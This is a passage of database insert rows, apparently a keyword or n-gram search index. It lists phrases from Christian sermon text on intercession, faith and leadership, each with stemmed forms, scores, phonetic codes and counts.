(275079, 'for your fellow', 'for your fellow', 0, 1, 1.5, 'F614', 1, '*'),
(275080, 'found in matthew', 'found in matthew', 0, 1, 1.5333, 'F5353', 1, '*'),
(275081, 'foundation on', 'foundat on', 0, 1, 1.4333, 'F535', 1, '*'),
(275082, 'foundation on which', 'foundat on which', 0, 1, 1.6333, 'F5352', 1, '*'),
(275083, 'friends town', 'friend town', 0, 1, 1.4, 'F653235', 1, '*'),
(275084, 'friends town state', 'friend town state', 0, 1, 1.6, 'F65323523', 1, '*'),
(275085, 'from any', 'from any', 0, 1, 1.2667, 'F650', 2, '*'),
(275086, 'from any assignment', 'from any assignment', 0, 1, 1.6333, 'F65253', 1, '*'),
(275087, 'from the above', 'from the above', 0, 1, 1.4667, 'F6531', 1, '*'),
(275088, 'fulfill your', 'fulfil your', 0, 1, 1.4, 'F4146', 1, '*'),
(275089, 'fulfill your divine', 'fulfil your divine', 0, 1, 1.6333, 'F4146315', 1, '*'),
(275090, 'fullest', 'fullest', 0, 0, 0.4667, 'F423', 1, '*'),
(275091, 'fullest is', 'fullest is', 0, 1, 1.3333, 'F4232', 1, '*'),
(275092, 'fullest is already', 'fullest is already', 0, 1, 1.6, 'F4232463', 1, '*'),
(275093, 'function as', 'function as', 0, 1, 1.3667, 'F52352', 1, '*'),
(275094, 'function as men', 'function as men', 0, 1, 1.5, 'F523525', 1, '*'),
(275095, 'further today', 'further today', 0, 1, 1.4333, 'F6363', 1, '*'),
(275096, 'further today by', 'further today by', 0, 1, 1.5333, 'F63631', 1, '*'),
(275097, 'get out yourself', 'get out yourself', 0, 1, 1.5333, 'G36241', 1, '*'),
(275098, 'get that', 'get that', 0, 1, 1.2667, 'G300', 1, '*'),
(275099, 'get that stamina', 'get that stamina', 0, 1, 1.5333, 'G3235', 1, '*'),
(275100, 'give what', 'give what', 0, 1, 1.3, 'G130', 1, '*'),
(275101, 'give what you', 'give what you', 0, 1, 1.4333, 'G130', 1, '*'),
(275102, 'given the primary', 'given the primary', 0, 1, 1.5667, 'G1531656', 1, '*'),
(275103, 'given to you', 'given to you', 0, 1, 1.4, 'G153', 1, '*'),
(275104, 'glory to the', 'glori to the', 0, 1, 1.4, 'G463', 1, '*'),
(275105, 'go a', 'go a', 0, 1, 1.1333, 'G000', 1, '*'),
(275106, 'go a little', 'go a little', 0, 1, 1.3667, 'G434', 1, '*'),
(275107, 'god and wants', 'god and wants', 0, 1, 1.4333, 'G353532', 1, '*'),
(275108, 'god expects us', 'god expects us', 0, 1, 1.4667, 'G321232', 1, '*'),
(275109, 'god for us', 'god for us', 0, 1, 1.3333, 'G3162', 1, '*'),
(275110, 'god had', 'god had', 0, 1, 1.2333, 'G300', 2, '*'),
(275111, 'god had already', 'god had already', 0, 1, 1.5, 'G3463', 1, '*'),
(275112, 'god leads', 'god leads', 0, 1, 1.3, 'G3432', 1, '*'),
(275113, 'god leads people', 'god leads people', 0, 1, 1.5333, 'G343214', 1, '*'),
(275114, 'god\'s glory to', 'god glory to', 0, 1, 1.4667, 'G32463', 1, '*'),
(275115, 'god\'s word all', 'god word all', 0, 1, 1.4667, 'G32634', 1, '*'),
(275116, 'god\'s word through', 'god word through', 0, 1, 1.6, 'G326362', 1, '*'),
(275117, 'good intercessor', 'good intercessor', 0, 1, 1.5333, 'G353626', 1, '*'),
(275118, 'good intercessor needs', 'good intercessor needs', 0, 1, 1.7333, 'G353626532', 1, '*'),
(275119, 'gospel doesn\'t', 'gospel doesn', 0, 1, 1.4667, 'G143253', 1, '*'),
(275120, 'gospel doesn\'t necessarily', 'gospel doesn necessarily', 0, 1, 1.8667, 'G1432535264', 1, '*'),
(275121, 'gospel of peace', 'gospel of peace', 0, 1, 1.5, 'G1412', 1, '*'),
(275122, 'gospel to be', 'gospel to be', 0, 1, 1.4, 'G1431', 1, '*'),
(275123, 'great faith as', 'great faith as', 0, 1, 1.4667, 'G63132', 1, '*'),
(275124, 'great faith hebrews', 'great faith hebrews', 0, 1, 1.6333, 'G6313162', 1, '*'),
(275125, 'great faith in', 'great faith in', 0, 1, 1.4667, 'G63135', 1, '*'),
(275126, 'great men of', 'great men of', 0, 1, 1.4, 'G6351', 1, '*'),
(275127, 'ground sadly', 'ground sadly', 0, 1, 1.4, 'G653234', 1, '*'),
(275128, 'ground sadly enough', 'ground sadly enough', 0, 1, 1.6333, 'G65323452', 1, '*'),
(275129, 'habakkuk', 'habakkuk', 0, 0, 0.5333, 'H120', 1, '*'),
(275130, 'habakkuk 2', 'habakkuk 2', 0, 1, 1.3333, 'H120', 1, '*'),
(275131, 'habakkuk 2 7', 'habakkuk 2 7', 0, 1, 1.4, 'H120', 1, '*'),
(275132, 'had already', 'had already', 0, 1, 1.3667, 'H3463', 1, '*'),
(275133, 'had already said', 'had already said', 0, 1, 1.5333, 'H346323', 1, '*'),
(275134, 'hand in', 'hand in', 0, 1, 1.2333, 'H535', 1, '*'),
(275135, 'hand in hand', 'hand in hand', 0, 1, 1.4, 'H5353', 1, '*'),
(275136, 'hand to', 'hand to', 0, 1, 1.2333, 'H530', 1, '*'),
(275137, 'hand to help', 'hand to help', 0, 1, 1.4, 'H5341', 1, '*'),
(275138, 'has called us', 'ha called us', 0, 1, 1.4333, 'H2432', 1, '*'),
(275139, 'hates god', 'hate god', 0, 1, 1.3, 'H323', 1, '*'),
(275140, 'hates god and', 'hate god and', 0, 1, 1.4333, 'H32353', 1, '*'),
(275141, 'hates you', 'hate you', 0, 1, 1.3, 'H320', 1, '*'),
(275142, 'hates you he', 'hate you he', 0, 1, 1.4, 'H320', 1, '*'),
(275143, 'have 4', 'have 4', 0, 1, 1.2, 'H100', 1, '*'),
(275144, 'have 4 youare', 'have 4 youare', 0, 1, 1.4333, 'H160', 1, '*'),
(275145, 'have overlooked', 'have overlooked', 0, 1, 1.5, 'H16423', 1, '*'),
(275146, 'have overlooked for', 'have overlooked for', 0, 1, 1.6333, 'H1642316', 1, '*'),
(275147, 'have the capacity', 'have the capacity', 0, 1, 1.5667, 'H132123', 1, '*'),
(275148, 'have the title', 'have the title', 0, 1, 1.4667, 'H134', 1, '*'),
(275149, 'he hates', 'he hates', 0, 1, 1.2667, 'H320', 1, '*'),
(275150, 'he hates god', 'he hates god', 0, 1, 1.4, 'H323', 1, '*'),
(275151, 'he\'s a', 'he a', 0, 1, 1.2, 'H200', 1, '*'),
(275152, 'he\'s a human', 'he a human', 0, 1, 1.4, 'H250', 1, '*'),
(275153, 'hear many', 'hear many', 0, 1, 1.3, 'H650', 1, '*'),
(275154, 'hear many stories', 'hear many stories', 0, 1, 1.5667, 'H652362', 1, '*'),
(275155, 'heard into', 'heard into', 0, 1, 1.3333, 'H6353', 1, '*'),
(275156, 'heard into practice', 'heard into practice', 0, 1, 1.6333, 'H635316232', 1, '*'),
(275157, 'heart 5 you', 'heart 5 you', 0, 1, 1.3667, 'H630', 1, '*'),
(275158, 'hearts a', 'heart a', 0, 1, 1.2667, 'H632', 1, '*'),
(275159, 'hearts a christian', 'heart a christian', 0, 1, 1.6, 'H6326235', 1, '*'),
(275160, 'hebrews 11', 'hebrew 11', 0, 1, 1.3333, 'H162', 1, '*'),
(275161, 'hebrews 11 3', 'hebrew 11 3', 0, 1, 1.4, 'H162', 1, '*'),
(275162, 'hell just', 'hell just', 0, 1, 1.3, 'H423', 1, '*'),
(275163, 'hell just broke', 'hell just broke', 0, 1, 1.5, 'H423162', 1, '*'),
(275164, 'help you effectively', 'help you effectively', 0, 1, 1.6667, 'H412314', 1, '*'),
(275165, 'high spiritual', 'high spiritual', 0, 1, 1.4667, 'H21634', 1, '*'),
(275166, 'high spiritual stamina', 'high spiritual stamina', 0, 1, 1.7333, 'H21634235', 1, '*'),
(275167, 'him but the', 'him but the', 0, 1, 1.3667, 'H513', 1, '*'),
(275168, 'him wherever', 'him wherever', 0, 1, 1.4, 'H5616', 1, '*'),
(275169, 'him wherever they', 'him wherever they', 0, 1, 1.5667, 'H56163', 1, '*'),
(275170, 'his cohorts', 'hi cohorts', 0, 1, 1.3667, 'H2632', 1, '*'),
(275171, 'his cohorts not', 'hi cohorts not', 0, 1, 1.5, 'H263253', 1, '*'),
(275172, 'his faith', 'hi faith', 0, 1, 1.3, 'H213', 1, '*'),
(275173, 'his faith everything', 'hi faith everything', 0, 1, 1.6667, 'H21316352', 1, '*'),
(275174, 'his life living', 'hi life living', 0, 1, 1.5, 'H2414152', 1, '*'),
(275175, 'his servants', 'hi servants', 0, 1, 1.4, 'H261532', 1, '*'),
(275176, 'his servants and', 'hi servants and', 0, 1, 1.5333, 'H26153253', 1, '*'),
(275177, 'his soul which', 'hi soul which', 0, 1, 1.4667, 'H242', 1, '*'),
(275178, 'how most', 'how most', 0, 1, 1.2667, 'H523', 1, '*'),
(275179, 'how most of', 'how most of', 0, 1, 1.3667, 'H5231', 1, '*'),
(275180, 'how to acquire', 'how to acquire', 0, 1, 1.4667, 'H326', 1, '*'),
(275181, 'how to drive', 'how to drive', 0, 1, 1.4, 'H361', 1, '*'),
(275182, 'human being and', 'human being and', 0, 1, 1.5, 'H515253', 1, '*'),
(275183, 'human beings', 'human beings', 0, 1, 1.4, 'H5152', 1, '*'),
(275184, 'human beings there', 'human beings there', 0, 1, 1.6, 'H515236', 1, '*'),
(275185, 'if you want', 'if you want', 0, 1, 1.3667, 'I153', 2, '*'),
(275186, 'ignites', 'ignit', 0, 0, 0.4667, 'I2532', 1, '*'),
(275187, 'ignites the', 'ignit the', 0, 1, 1.3667, 'I25323', 1, '*'),
(275188, 'ignites the fire', 'ignit the fire', 0, 1, 1.5333, 'I2532316', 1, '*'),
(275189, 'important for you', 'import for you', 0, 1, 1.5667, 'I51635316', 1, '*'),
(275190, 'in a capacity', 'in a capacity', 0, 1, 1.4333, 'I52123', 1, '*'),
(275191, 'in church a', 'in church a', 0, 1, 1.3667, 'I5262', 1, '*'),
(275192, 'in doing', 'in doing', 0, 1, 1.2667, 'I5352', 1, '*'),
(275193, 'in doing this', 'in doing this', 0, 1, 1.4333, 'I535232', 1, '*'),
(275194, 'in ephesians', 'in ephesians', 0, 1, 1.4, 'I51252', 1, '*'),
(275195, 'in ephesians 6', 'in ephesians 6', 0, 1, 1.4667, 'I51252', 1, '*'),
(275196, 'in every situation', 'in every situation', 0, 1, 1.6, 'I516235', 2, '*'),
(275197, 'in faith and', 'in faith and', 0, 1, 1.4, 'I51353', 1, '*'),
(275198, 'in faith is', 'in faith is', 0, 1, 1.3667, 'I5132', 1, '*'),
(275199, 'in hand', 'in hand', 0, 1, 1.2333, 'I530', 1, '*'),
(275200, 'in hand to', 'in hand to', 0, 1, 1.3333, 'I530', 1, '*'),
(275201, 'in him but', 'in him but', 0, 1, 1.3333, 'I513', 1, '*'),
(275202, 'in intercession', 'in intercession', 0, 1, 1.5, 'I53625', 1, '*'),
(275203, 'in intercession the', 'in intercession the', 0, 1, 1.6333, 'I536253', 1, '*'),
(275204, 'in leadership have', 'in leadership have', 0, 1, 1.6, 'I543621', 1, '*'),
(275205, 'in leadership those', 'in leadership those', 0, 1, 1.6333, 'I54362132', 1, '*'),
(275206, 'in matthew', 'in matthew', 0, 1, 1.3333, 'I530', 1, '*'),
(275207, 'in matthew 28', 'in matthew 28', 0, 1, 1.4333, 'I530', 1, '*'),
(275208, 'in proverbs', 'in proverbs', 0, 1, 1.3667, 'I5161612', 1, '*'),
(275209, 'in proverbs 23', 'in proverbs 23', 0, 1, 1.4667, 'I5161612', 1, '*'),
(275210, 'in that day', 'in that day', 0, 1, 1.3667, 'I530', 1, '*'),
(275211, 'in the previous', 'in the previous', 0, 1, 1.5, 'I531612', 1, '*'),
(275212, 'in this world', 'in this world', 0, 1, 1.4333, 'I532643', 1, '*'),
(275213, 'in those notes', 'in those notes', 0, 1, 1.4667, 'I532532', 1, '*'),
(275214, 'in your church', 'in your church', 0, 1, 1.4667, 'I56262', 1, '*'),
(275215, 'in your daily', 'in your daily', 0, 1, 1.4333, 'I5634', 1, '*'),
(275216, 'in your direction', 'in your direction', 0, 1, 1.5667, 'I5636235', 1, '*'),
(275217, 'instead embrace', 'instead embrace', 0, 1, 1.5, 'I5235162', 1, '*'),
(275218, 'instead embrace it', 'instead embrace it', 0, 1, 1.6, 'I52351623', 1, '*'),
(275219, 'instruction and', 'instruct and', 0, 1, 1.5, 'I52362353', 1, '*'),
(275220, 'instruction and understanding', 'instruct and understanding', 0, 1, 1.9667, 'I52362353536235352', 1, '*'),
(275221, 'intercede', 'interced', 0, 0, 0.6, 'I53623', 1, '*'),
(275222, 'intercede for', 'interced for', 0, 1, 1.4333, 'I5362316', 1, '*'),
(275223, 'intercede for your', 'interced for your', 0, 1, 1.6, 'I5362316', 1, '*'),
(275224, 'intercession serious', 'intercess serious', 0, 1, 1.6667, 'I53625262', 1, '*'),
(275225, 'intercession serious you\'ll', 'intercess serious you', 0, 1, 1.9, 'I536252624', 1, '*'),
(275226, 'intercession the', 'intercess the', 0, 1, 1.5333, 'I536253', 1, '*'),
(275227, 'intercession the stronger', 'intercess the stronger', 0, 1, 1.8333, 'I536253236526', 1, '*'),
(275228, 'intercessor', 'intercessor', 0, 0, 0.7333, 'I53626', 1, '*'),
(275229, 'intercessor ephesians', 'intercessor ephesians', 0, 1, 1.7, 'I536261252', 1, '*'),
(275230, 'intercessor ephesians 6', 'intercessor ephesians 6', 0, 1, 1.7667, 'I536261252', 1, '*'),
(275231, 'intercessor needs', 'intercessor needs', 0, 1, 1.5667, 'I53626532', 1, '*'),
(275232, 'intercessor needs high', 'intercessor needs high', 0, 1, 1.7333, 'I53626532', 1, '*'),
(275233, 'intercessory', 'intercessori', 0, 0, 0.8, 'I53626', 1, '*'),
(275234, 'intercessory ability', 'intercessori ability', 0, 1, 1.6667, 'I53626143', 1, '*'),
(275235, 'intercessory ability as', 'intercessori ability as', 0, 1, 1.7667, 'I536261432', 1, '*'),
(275236, 'into practice', 'into practice', 0, 1, 1.4333, 'I5316232', 1, '*'),
(275237, 'into practice consider', 'into practice consider', 0, 1, 1.7333, 'I53162325236', 1, '*'),
(275238, 'into practice in', 'into practice in', 0, 1, 1.5333, 'I53162325', 1, '*'),
(275239, 'is already', 'is already', 0, 1, 1.3333, 'I2463', 1, '*'),
(275240, 'is already available', 'is already available', 0, 1, 1.6667, 'I24631414', 1, '*'),
(275241, 'is an active', 'is an active', 0, 1, 1.4, 'I25231', 1, '*'),
(275242, 'is an urgent', 'is an urgent', 0, 1, 1.4, 'I256253', 1, '*'),
(275243, 'is because it', 'is because it', 0, 1, 1.4333, 'I2123', 1, '*'),
(275244, 'is by', 'is by', 0, 1, 1.1667, 'I210', 1, '*'),
(275245, 'is by faith', 'is by faith', 0, 1, 1.3667, 'I213', 1, '*'),
(275246, 'is by praying', 'is by praying', 0, 1, 1.4333, 'I21652', 1, '*'),
(275247, 'is god has', 'is god has', 0, 1, 1.3333, 'I232', 1, '*'),
(275248, 'is how most', 'is how most', 0, 1, 1.3667, 'I2523', 1, '*'),
(275249, 'is lifted', 'is lifted', 0, 1, 1.3, 'I2413', 1, '*'),
(275250, 'is lifted up', 'is lifted up', 0, 1, 1.4, 'I24131', 1, '*'),
(275251, 'is not upright', 'is not upright', 0, 1, 1.4667, 'I2531623', 1, '*'),
(275252, 'is our prescribed', 'is our prescribed', 0, 1, 1.5667, 'I26162613', 1, '*'),
(275253, 'is spend', 'is spend', 0, 1, 1.2667, 'I2153', 1, '*'),
(275254, 'is spend your', 'is spend your', 0, 1, 1.4333, 'I21536', 1, '*'),
(275255, 'is the art', 'is the art', 0, 1, 1.3333, 'I2363', 1, '*'),
(275256, 'is the basic', 'is the basic', 0, 1, 1.4, 'I2312', 1, '*'),
(275257, 'is the structure', 'is the structure', 0, 1, 1.5333, 'I23236236', 1, '*'),
(275258, 'is to approach', 'is to approach', 0, 1, 1.4667, 'I23162', 1, '*'),
(275259, 'is to lie', 'is to lie', 0, 1, 1.3, 'I234', 1, '*'),
(275260, 'is to reach', 'is to reach', 0, 1, 1.3667, 'I2362', 1, '*'),
(275261, 'it a look', 'it a look', 0, 1, 1.3, 'I342', 1, '*'),
(275262, 'it is by', 'it is by', 0, 1, 1.2667, 'I321', 1, '*'),
(275263, 'it is our', 'it is our', 0, 1, 1.3, 'I326', 1, '*'),
(275264, 'it seems like', 'it seems like', 0, 1, 1.4333, 'I325242', 1, '*'),
(275265, 'it wholeheartedly', 'it wholeheartedly', 0, 1, 1.5667, 'I34634', 1, '*'),
(275266, 'it wholeheartedly effective', 'it wholeheartedly effective', 0, 1, 1.9, 'I346341231', 1, '*'),
(275267, 'it\'s extremely', 'it extremely', 0, 1, 1.4667, 'I323654', 1, '*'),
(275268, 'it\'s extremely important', 'it extremely important', 0, 1, 1.8, 'I323654516353', 1, '*'),
(275269, 'it\'s the man', 'it the man', 0, 1, 1.4, 'I3235', 1, '*'),
(275270, 'item 22', 'item 22', 0, 1, 1.2333, 'I350', 1, '*'),
(275271, 'item 22 correct', 'item 22 correct', 0, 1, 1.5, 'I352623', 1, '*'),
(275272, 'just broke', 'just broke', 0, 1, 1.3333, 'J3162', 1, '*'),
(275273, 'just broke loose', 'just broke loose', 0, 1, 1.5333, 'J316242', 1, '*'),
(275274, 'just shall', 'just shall', 0, 1, 1.3333, 'J324', 1, '*'),
(275275, 'just shall live', 'just shall live', 0, 1, 1.5, 'J3241', 1, '*'),
(275276, 'k2 item 22', 'k2 item 22', 0, 1, 1.3333, 'K350', 1, '*'),
(275277, 'key points', 'kei points', 0, 1, 1.3333, 'K1532', 1, '*'),
(275278, 'key points from', 'kei points from', 0, 1, 1.5, 'K1532165', 1, '*'),
(275279, 'know a', 'know a', 0, 1, 1.2, 'K500', 1, '*'),
(275280, 'know a good', 'know a good', 0, 1, 1.3667, 'K523', 1, '*'),
(275281, 'know and', 'know and', 0, 1, 1.2667, 'K530', 1, '*'),
(275282, 'know and can', 'know and can', 0, 1, 1.4, 'K5325', 1, '*'),
(275283, 'know he\'s', 'know he', 0, 1, 1.3, 'K520', 1, '*'),
(275284, 'know he\'s a', 'know he a', 0, 1, 1.3667, 'K520', 1, '*'),
(275285, 'know when', 'know when', 0, 1, 1.3, 'K500', 1, '*'),
(275286, 'know when a', 'know when a', 0, 1, 1.3667, 'K500', 1, '*'),
(275287, 'knowledge wisdom', 'knowledg wisdom', 0, 1, 1.5333, 'K543235', 1, '*'),
(275288, 'knowledge wisdom and', 'knowledg wisdom and', 0, 1, 1.6667, 'K5432353', 1, '*'),
(275289, 'knows what', 'know what', 0, 1, 1.3333, 'K523', 1, '*'),
(275290, 'knows what to', 'know what to', 0, 1, 1.4333, 'K523', 1, '*'),
(275291, 'last week', 'last week', 0, 1, 1.3, 'L232', 1, '*'),
(275292, 'last week we', 'last week we', 0, 1, 1.4, 'L232', 1, '*'),
(275293, 'lastly you', 'lastli you', 0, 1, 1.3333, 'L234', 1, '*'),
(275294, 'lastly you must', 'lastli you must', 0, 1, 1.5, 'L234523', 1, '*'),
(275295, 'lead and', 'lead and', 0, 1, 1.2667, 'L353', 1, '*'),
(275296, 'lead and those', 'lead and those', 0, 1, 1.4667, 'L3532', 1, '*'),
(275297, 'lead are', 'lead are', 0, 1, 1.2667, 'L360', 1, '*'),
(275298, 'lead are those', 'lead are those', 0, 1, 1.4667, 'L3632', 1, '*'),
(275299, 'lead in', 'lead in', 0, 1, 1.2333, 'L350', 2, '*'),
(275300, 'lead in a', 'lead in a', 0, 1, 1.3, 'L350', 1, '*'),
(275301, 'lead others', 'lead others', 0, 1, 1.3667, 'L362', 1, '*'),
(275302, 'lead others in', 'lead others in', 0, 1, 1.4667, 'L3625', 1, '*'),
(275303, 'leader no', 'leader no', 0, 1, 1.3, 'L365', 1, '*'),
(275304, 'leader no matter', 'leader no matter', 0, 1, 1.5333, 'L36536', 1, '*'),
(275305, 'leadership have', 'leadership have', 0, 1, 1.5, 'L3621', 1, '*'),
(275306, 'leadership have the', 'leadership have the', 0, 1, 1.6333, 'L36213', 1, '*'),
(275307, 'leadership simple', 'leadership simple', 0, 1, 1.5667, 'L36212514', 1, '*'),
(275308, 'leadership simple and', 'leadership simple and', 0, 1, 1.7, 'L3621251453', 1, '*'),
(275309, 'leadership structure', 'leadership structure', 0, 1, 1.6667, 'L3621236236', 1, '*'),
(275310, 'leadership structure in', 'leadership structure in', 0, 1, 1.7667, 'L36212362365', 1, '*'),
(275311, 'leadership those', 'leadership those', 0, 1, 1.5333, 'L362132', 1, '*'),
(275312, 'leadership those who', 'leadership those who', 0, 1, 1.6667, 'L362132', 1, '*'),
(275313, 'leading everyone', 'lead everyone', 0, 1, 1.5333, 'L352165', 1, '*'),
(275314, 'leading everyone but', 'lead everyone but', 0, 1, 1.6667, 'L35216513', 1, '*'),
(275315, 'leads people', 'lead people', 0, 1, 1.4, 'L3214', 1, '*'),
(275316, 'leads people you', 'lead people you', 0, 1, 1.5333, 'L3214', 1, '*'),
(275317, 'learn how', 'learn how', 0, 1, 1.3, 'L650', 2, '*'),
(275318, 'learn how to', 'learn how to', 0, 1, 1.4, 'L653', 2, '*'),
(275319, 'learn to put', 'learn to put', 0, 1, 1.4, 'L65313', 1, '*'),
(275320, 'less likely', 'less likely', 0, 1, 1.3667, 'L2424', 1, '*'),
(275321, 'less likely the', 'less likely the', 0, 1, 1.5, 'L24243', 1, '*'),
(275322, 'let go', 'let go', 0, 1, 1.2, 'L320', 1, '*'),
(275323, 'let go a', 'let go a', 0, 1, 1.2667, 'L320', 1, '*'),
(275324, 'let us look', 'let us look', 0, 1, 1.3667, 'L3242', 1, '*'),
(275325, 'lie to', 'lie to', 0, 1, 1.2, 'L300', 1, '*'),
(275326, 'lie to you', 'lie to you', 0, 1, 1.3333, 'L300', 1, '*'),
(275327, 'life living', 'life living', 0, 1, 1.3667, 'L14152', 1, '*'),
(275328, 'life living like', 'life living like', 0, 1, 1.5333, 'L1415242', 1, '*'),
(275329, 'life very', 'life very', 0, 1, 1.3, 'L160', 1, '*'),
(275330, 'life very serious', 'life very serious', 0, 1, 1.5667, 'L16262', 1, '*'),
(275331, 'lifted', 'lift', 0, 0, 0.4, 'L130', 1, '*'),
(275332, 'lifted up', 'lift up', 0, 1, 1.3, 'L131', 1, '*'),
(275333, 'lifted up is', 'lift up is', 0, 1, 1.4, 'L1312', 1, '*'),
(275334, 'like a man', 'like a man', 0, 1, 1.3333, 'L250', 1, '*'),
(275335, 'like all', 'like all', 0, 1, 1.2667, 'L240', 1, '*'),
(275336, 'like all hell', 'like all hell', 0, 1, 1.4333, 'L240', 1, '*'),
(275337, 'like an animal', 'like an animal', 0, 1, 1.4667, 'L254', 1, '*'),
(275338, 'like bad', 'like bad', 0, 1, 1.2667, 'L213', 1, '*'),
(275339, 'like bad students', 'like bad students', 0, 1, 1.5667, 'L21323532', 1, '*'),
(275340, 'like we', 'like we', 0, 1, 1.2333, 'L200', 1, '*'),
(275341, 'like we saw', 'like we saw', 0, 1, 1.3667, 'L200', 1, '*'),
(275342, 'likely the', 'like the', 0, 1, 1.3333, 'L243', 1, '*'),
(275343, 'likely the devil', 'like the devil', 0, 1, 1.5333, 'L24314', 1, '*'),
(275344, 'little further', 'littl further', 0, 1, 1.4667, 'L341636', 1, '*'),
(275345, 'little further today', 'littl further today', 0, 1, 1.6667, 'L3416363', 1, '*'),
(275346, 'live by his', 'live by his', 0, 1, 1.3667, 'L120', 1, '*'),
(275347, 'living like', 'live like', 0, 1, 1.3667, 'L15242', 1, '*'),
(275348, 'living like an', 'live like an', 0, 1, 1.4667, 'L152425', 1, '*'),
(275349, 'long periods', 'long periods', 0, 1, 1.4, 'L521632', 1, '*'),
(275350, 'long periods of', 'long periods of', 0, 1, 1.5, 'L5216321', 1, '*'),
(275351, 'long time by', 'long time by', 0, 1, 1.4, 'L52351', 1, '*'),
(275352, 'long time is', 'long time is', 0, 1, 1.4, 'L52352', 1, '*'),
(275353, 'looking at', 'look at', 0, 1, 1.3333, 'L2523', 1, '*'),
(275354, 'looking at the', 'look at the', 0, 1, 1.4667, 'L2523', 1, '*'),
(275355, 'loose', 'loos', 0, 0, 0.3333, 'L200', 1, '*'),
(275356, 'loose in', 'loos in', 0, 1, 1.2667, 'L250', 1, '*'),
(275357, 'loose in your', 'loos in your', 0, 1, 1.4333, 'L256', 1, '*'),
(275358, 'loved one', 'love one', 0, 1, 1.3, 'L135', 1, '*'),
(275359, 'loved one needs', 'love one needs', 0, 1, 1.5, 'L13532', 1, '*'),
(275360, 'make a plan', 'make a plan', 0, 1, 1.3667, 'M2145', 1, '*'),
(275361, 'man who doesn\'t', 'man who doesn', 0, 1, 1.5, 'M3253', 1, '*'),
(275362, 'man who knows', 'man who knows', 0, 1, 1.4333, 'M252', 1, '*'),
(275363, 'man woman', 'man woman', 0, 1, 1.3, 'M000', 1, '*'),
(275364, 'man woman of', 'man woman of', 0, 1, 1.4, 'M100', 1, '*'),
(275365, 'many christians', 'mani christians', 0, 1, 1.5, 'M262352', 1, '*'),
(275366, 'many christians have', 'mani christians have', 0, 1, 1.6667, 'M2623521', 1, '*'),
(275367, 'many roles', 'mani roles', 0, 1, 1.3333, 'M642', 1, '*'),
(275368, 'many roles god', 'mani roles god', 0, 1, 1.4667, 'M6423', 1, '*'),
(275369, 'many stories', 'mani stories', 0, 1, 1.4, 'M2362', 1, '*'),
(275370, 'many stories of', 'mani stories of', 0, 1, 1.5, 'M23621', 1, '*'),
(275371, 'matter what your', 'matter what your', 0, 1, 1.5333, 'M3636', 1, '*'),
(275372, 'matter where', 'matter where', 0, 1, 1.4, 'M360', 1, '*'),
(275373, 'matter where you', 'matter where you', 0, 1, 1.5333, 'M360', 1, '*'),
(275374, 'may not necessarily', 'mai not necessarily', 0, 1, 1.6333, 'M35264', 1, '*'),
(275375, 'mean you\'ll', 'mean you', 0, 1, 1.3667, 'M400', 1, '*'),
(275376, 'mean you\'ll officially', 'mean you officially', 0, 1, 1.7333, 'M4124', 1, '*'),
(275377, 'means ofliving', 'mean ofliving', 0, 1, 1.4667, 'M214152', 1, '*'),
(275378, 'means ofliving on', 'mean ofliving on', 0, 1, 1.5667, 'M2141525', 1, '*'),
(275379, 'membership serious', 'membership serious', 0, 1, 1.6, 'M1621262', 1, '*'),
(275380, 'membership serious don\'t', 'membership serious don', 0, 1, 1.8, 'M1621262353', 1, '*'),
(275381, 'men of faith', 'men of faith', 0, 1, 1.4, 'M130', 1, '*'),
(275382, 'men of great', 'men of great', 0, 1, 1.4, 'M1263', 1, '*'),
(275383, 'mind and', 'mind and', 0, 1, 1.2667, 'M353', 1, '*'),
(275384, 'mind and spirit', 'mind and spirit', 0, 1, 1.5, 'M3532163', 1, '*'),
(275385, 'minister of the', 'minist of the', 0, 1, 1.5, 'M23613', 2, '*'),
(275386, 'minster', 'minster', 0, 0, 0.4667, 'M236', 1, '*'),
(275387, 'minster of', 'minster of', 0, 1, 1.3333, 'M2361', 1, '*'),
(275388, 'minster of the', 'minster of the', 0, 1, 1.4667, 'M23613', 1, '*'),
(275389, 'mixtures part 2', 'mixtur part 2', 0, 1, 1.5, 'M2362163', 1, '*'),
(275390, 'mixtures there', 'mixtur there', 0, 1, 1.4667, 'M236236', 1, '*'),
(275391, 'mixtures there is', 'mixtur there is', 0, 1, 1.5667, 'M2362362', 1, '*'),
(275392, 'money not', 'monei not', 0, 1, 1.3, 'M300', 1, '*'),
(275393, 'money not only', 'monei not only', 0, 1, 1.4667, 'M354', 1, '*'),
(275394, 'more effective', 'more effective', 0, 1, 1.4667, 'M61231', 1, '*'),
(275395, 'more effective your', 'more effective your', 0, 1, 1.6333, 'M612316', 1, '*'),
(275396, 'more scriptures', 'more scriptures', 0, 1, 1.5, 'M6261362', 1, '*'),
(275397, 'more scriptures you', 'more scriptures you', 0, 1, 1.6333, 'M6261362', 1, '*'),
(275398, 'more you engage', 'more you engage', 0, 1, 1.5, 'M652', 1, '*'),
(275399, 'morning as', 'morn as', 0, 1, 1.3333, 'M652', 1, '*'),
(275400, 'morning as we\'ve', 'morn as we', 0, 1, 1.5333, 'M6521', 1, '*'),
(275401, 'most of christians', 'most of christians', 0, 1, 1.6, 'M231262352', 1, '*'),
(275402, 'muscles\'', 'muscl', 0, 0, 0.5333, 'M242', 1, '*'),
(275403, 'muscles\' develop', 'muscl develop', 0, 1, 1.5333, 'M2423141', 1, '*'),
(275404, 'muscles\' develop don\'t', 'muscl develop don', 0, 1, 1.7333, 'M2423141353', 1, '*'),
(275405, 'music also', 'music also', 0, 1, 1.3333, 'M242', 1, '*'),
(275406, 'music also you', 'music also you', 0, 1, 1.4667, 'M242', 1, '*'),
(275407, 'must actively seek', 'must actively seek', 0, 1, 1.6, 'M2323142', 1, '*'),
(275408, 'must arm', 'must arm', 0, 1, 1.2667, 'M2365', 1, '*'),
(275409, 'must arm yourself', 'must arm yourself', 0, 1, 1.5667, 'M23656241', 1, '*'),
(275410, 'must be ready', 'must be ready', 0, 1, 1.4333, 'M23163', 1, '*'),
(275411, 'must learn to', 'must learn to', 0, 1, 1.4333, 'M234653', 1, '*'),
(275412, 'must play', 'must play', 0, 1, 1.3, 'M2314', 1, '*'),
(275413, 'must play romans', 'must play romans', 0, 1, 1.5333, 'M2314652', 1, '*'),
(275414, 'must remember', 'must remember', 0, 1, 1.4333, 'M236516', 1, '*'),
(275415, 'must remember that', 'must remember that', 0, 1, 1.6, 'M2365163', 1, '*'),
(275416, 'must spend', 'must spend', 0, 1, 1.3333, 'M232153', 2, '*'),
(275417, 'must spend your', 'must spend your', 0, 1, 1.5, 'M2321536', 1, '*'),
(275418, 'must take your', 'must take your', 0, 1, 1.4667, 'M2326', 1, '*'),
(275419, 'nation and', 'nation and', 0, 1, 1.3333, 'N353', 1, '*'),
